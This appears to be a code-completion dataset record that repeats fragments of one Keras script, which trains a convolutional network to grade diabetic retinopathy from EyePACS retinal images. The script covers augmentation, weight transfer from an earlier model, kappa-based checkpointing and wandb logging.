seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name))
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa')
plt.xlabel('epoch')
plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | get_experiment_id | identifier_name |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
|
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def get_experiment_id():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name))
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
val_df["image"]=val_df["image"].apply(append_ext)
train_generator = train_datagen.flow_from_dataframe(
dataframe=train_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
valid_generator = val_datagen.flow_from_dataframe(
dataframe=val_df,
directory='/data1/visionlab/data/EyePACS_2015/256-EyePACS-all',
x_col="image",
y_col="level",
has_ext=False,
batch_size=32,
seed=42,
shuffle=True,
class_mode="other",
target_size=(256,256))
STEP_SIZE_TRAIN=train_generator.n//train_generator.batch_size
STEP_SIZE_VALID=valid_generator.n//valid_generator.batch_size
#
#balance_weights = K.variable(class_weight.compute_class_weight(
# 'balanced',
# np.unique(train_df.level),
# train_df.level))
callbacks = [
# Resample_Iterator(balance_weights),
Val_QWK(valid_generator, STEP_SIZE_VALID),
ModelCheckpoint(experiment_id + "-val_kappa_checkpoint.hdf5", monitor='val_kappa', verbose=1, save_best_only=True, mode='max'),
# EarlyStopping(monitor='val_kappa', patience=200, min_delta=0.001, verbose=1, restore_best_weights=True, mode='max',baseline=None),
Val_CM(valid_generator, STEP_SIZE_VALID),
LearningRateScheduler(scheduler, verbose=1),
# ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=10, verbose=1, mode='min', min_delta=0.01, cooldown=0, min_lr=0),
TensorBoard(log_dir='./Graph', histogram_freq=0, write_graph=True, write_images=True),
WandbCallback(),
]
history=model.fit_generator(generator=train_generator,
steps_per_epoch=STEP_SIZE_TRAIN,
validation_data=valid_generator,
validation_steps=STEP_SIZE_VALID,
# class_weight=[balance_weights],
callbacks=callbacks,
workers=8,
use_multiprocessing=False,
epochs=200
)
#model.save(os.path.join(wandb.run.dir, "model.h5"))
# list all data in history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model accuracy.png')
# summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('model loss')
plt.ylabel('loss')
plt.xlabel('epoch')
plt.legend(['train', 'validation'], loc='upper left')
plt.show()
#plt.savefig('model loss.png')
# summarize history for val_kappa
plt.plot(history.history['val_kappa'])
plt.title('Validation_Kappa')
plt.ylabel('val_kappa')
plt.xlabel('epoch')
plt.legend([ 'validation'], loc='upper left')
plt.show()
#plt.savefig('model validation_kappa.png') | print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed) | identifier_body |
KR_256_5x5_32_Team.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 16 01:59:12 2020
@author: visionlab
"""
import pandas as pd
import numpy as np
from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D,BatchNormalization,Dense, Dropout, Flatten, LeakyReLU, Lambda
from custom_pooling import RMSPooling2D
from keras.optimizers import SGD, Adam
from keras_preprocessing.image import ImageDataGenerator
from sklearn.utils import class_weight
from sklearn.metrics import confusion_matrix, classification_report
from keras.callbacks import EarlyStopping, ModelCheckpoint,LearningRateScheduler, TensorBoard
from datetime import datetime as dt
from keras.initializers import Constant,Orthogonal
from keras import regularizers
from Kappa_Skl import kappa
import keras.backend as K
import matplotlib.pyplot as plt
import itertools
from Resample_Iterator import Resample_Iterator
from Val_QWK import Val_QWK
from Val_CM import Val_CM
import tensorflow as tf
from keras.models import load_model
import random
from keras.applications.inception_resnet_v2 import preprocess_input
import wandb
import os
from wandb.keras import WandbCallback
from ImageDataAugmentor.image_data_augmentor import *
from albumentations import (
HorizontalFlip, IAAPerspective, ShiftScaleRotate, CLAHE, RandomRotate90,
Transpose, ShiftScaleRotate, Blur, OpticalDistortion, GridDistortion, HueSaturationValue,
IAAAdditiveGaussianNoise, GaussNoise, MotionBlur, MedianBlur, IAAPiecewiseAffine,
IAASharpen, IAAEmboss, RandomBrightnessContrast, Flip, OneOf, Compose
)
wandb.init(project="diabetic-retinopathy")
def seed_everything(seed=42):
print('Random seeds initialized')
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
tf.set_random_seed(seed)
def Maxout1(x):
return tf.contrib.layers.maxout(x, 512)
def Maxout2(x):
return tf.contrib.layers.maxout(x, 512)
def get_experiment_id():
time_str = dt.now().strftime('%Y-%m-%d-%H-%M-%S')
experiment_id = 'base_{}'.format(time_str)
return experiment_id
def scheduler(epoch):
if epoch == 150:
K.set_value(model.optimizer.lr, 0.00014339)
return K.get_value(model.optimizer.lr)
def strong_aug(p=1):
return Compose([
RandomRotate90(),
Flip(),
Transpose(),
OneOf([
IAAAdditiveGaussianNoise(),
GaussNoise(),
], p=0.2),
OneOf([
MotionBlur(p=0.2),
MedianBlur(blur_limit=3, p=0.1),
Blur(blur_limit=3, p=0.1),
], p=0.2),
OneOf([
CLAHE(clip_limit=2),
IAASharpen(),
IAAEmboss(),
RandomBrightnessContrast(),
], p=0.3),
HueSaturationValue(p=0.3),
], p=p)
AUGMENTATIONS = strong_aug(p=0.9)
seed_everything()
model = Sequential()
"""128 Layers"""
model.add(Conv2D(32, (5, 5), padding="same", strides=(2, 2), activation='linear', input_shape=(256, 256, 3), data_format="channels_last",
name='conv2d_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_1'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_1'))
model.add(Conv2D(32, (3, 3),padding="same", activation='linear',
name='conv2d_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_2'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_2'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_1'))
model.add(Conv2D(64, (5, 5),padding="same", strides=(2, 2), activation='linear',
name='conv2d_3',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_3'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_3'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_4',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_4'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_4'))
model.add(Conv2D(64, (3, 3),padding="same", activation='linear',
name='conv2d_5',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_5'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_5'))
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_2'))
#model.add(Dropout(0.25))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_6',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_6'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_6'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_7',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_7'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_7'))
model.add(Conv2D(128, (3, 3),padding="same", activation='linear',
name='conv2d_8',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_8'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_8'))
"""256 Layers"""
model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_3'))
#model.add(Dropout(0.25))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_9',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_11'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_12'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_10',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_12'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_13'))
model.add(Conv2D(256, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='conv2d_11',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_13'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_14'))
"""512 Layers"""
#model.add(MaxPooling2D(pool_size=3, strides=(2, 2),name='max_pooling2d_4'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_12',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_14'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_15'))
#
#model.add(Conv2D(512, (3, 3),padding="same", activation='linear', kernel_initializer=Orthogonal(gain=1.0),
# name='conv2d_13',bias_initializer=Constant(value=0.05),kernel_regularizer=regularizers.l2(0.0005)))
#model.add(BatchNormalization(name='batch_normalization_15'))
#model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_16'))
model.add(RMSPooling2D(pool_size=3,strides=(3, 3),name='rms_pooling2d_1'))
model.add(Dropout(0.5))
model.add(Flatten(name='flatten_1'))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_1',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_9'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_9'))
model.add(Lambda(Maxout1, name='lambda_1')) #instead of FeaturePoolLayer
model.add(Dropout(0.5))
model.add(Dense(1024, activation='linear', kernel_initializer=Orthogonal(gain=1.0),
name='dense_2',kernel_regularizer=regularizers.l2(0.0005)))
model.add(BatchNormalization(name='batch_normalization_10'))
model.add(LeakyReLU(alpha=0.01,name='leaky_re_lu_10'))
model.add(Lambda(Maxout2, name='lambda_2'))#instead of FeaturePoolLayer
model.add(Dense(1, activation='relu', kernel_initializer=Orthogonal(gain=1.0),
name='dense_3',kernel_regularizer=regularizers.l2(0.0005)))
pre_256_model = load_model('./Experiments/PH_1/EX_40/EX_40.hdf5', custom_objects={'RMSPooling2D': RMSPooling2D,'Lambda':Lambda,'tf':tf})
# copy weights from old model to new one
for layer in model.layers:
try:
layer.set_weights( pre_256_model.get_layer(name=layer.name).get_weights())
print("Succesfully transfered weights for layer {}".format(layer.name))
except:
print("Could not transfer weights for layer {}".format(layer.name))
#model.add_loss( sample_loss(y_true, y_pred, Homotopy ) )
adam = Adam(lr=0.0014339, beta_1=0.9, beta_2=0.999, epsilon=0.1, decay=1e-6, amsgrad=True)
model.compile(loss='mse', optimizer=adam, metrics=['mae', 'acc'])
model.summary()
#weight checking
#a = pre_128_model.layers[0].get_weights()[0]
#b = model.layers[0].get_weights()[0]
#if np.array_equal(a, b):
# print('equal')
#else:
# print('not equal')
experiment_id = get_experiment_id()
train_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_train.csv"), dtype={'image': str, 'level': float})
val_df=pd.read_csv(("/data1/visionlab/Thesis/labels/EyePACS_2015_new_val.csv"), dtype={'image': str, 'level': float})
train_datagen = ImageDataAugmentor(augment=AUGMENTATIONS,
preprocess_input=None, rescale=1./255.)
val_datagen = ImageDataGenerator(rescale=1./255.)
def append_ext(fn):
return fn+".tiff"
#def append_ext1(fn):
# return fn+".png"
train_df["image"]=train_df["image"].apply(append_ext)
